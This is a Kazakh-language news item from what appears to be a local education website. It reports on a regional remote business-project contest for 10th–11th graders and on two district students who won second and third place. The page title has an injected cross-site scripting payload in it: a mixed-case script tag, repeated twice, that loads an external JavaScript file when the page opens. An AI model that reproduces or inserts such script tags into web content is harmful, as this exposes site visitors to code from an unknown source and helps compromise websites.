"Сәтті Баста"облыстық қашықтықтан бизнес-жобалар байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.11.2022

2022 жылғы 23 қарашада Ақмола облысы білім басқармасының "Ақмола дарыны" дарынды балалар мен дарынды жастарды анықтау және қолдау орталығы "Сәтті Баста"облыстық қашықтықтан бизнес-жобалар конкурсын өткізді.

Конкурстың мақсаты:

- бизнес негіздеріне оқыту және кәсіби дағдыларды дамыту;

- білім алушылардың кәсіби өзін-өзі анықтауына қатысу;

- көшбасшылық қасиеттер мен әлеуметтік жауапкершілікті арттыру.

Байқауға облыстың жалпы білім беру ұйымдарының 10-11 сынып оқушылары қатысты. Облыстық кезеңге барлығы 47 жоба ұсынылды. Конкурс 2 кезеңде өтті: бизнес-жобаны қорғау (слайд – презентация,3 минутқа дейін) және "Мегамозг" зияткерлік конкурсы (кәсіпкерлік негіздерін білу). Байқау қорытындысы бойынша ауданымыздың оқушылары келесі жүлделі орындарға ие болды: Өркен ЖОББМ 11 сынып оқушысы - Ермұханов Расул 2 орын, Қонысбай  ЖОББМ 11 сынып оқушысы - Қасымова Дильназ 3 орын алды. Байқаудың барлық қатысушыларына алғысымызды білдіреміз және жүлделі орындарды құттықтаймыз!

Просмотров: 538


Пікір қосу



Деректерді қолтаңбаға қосу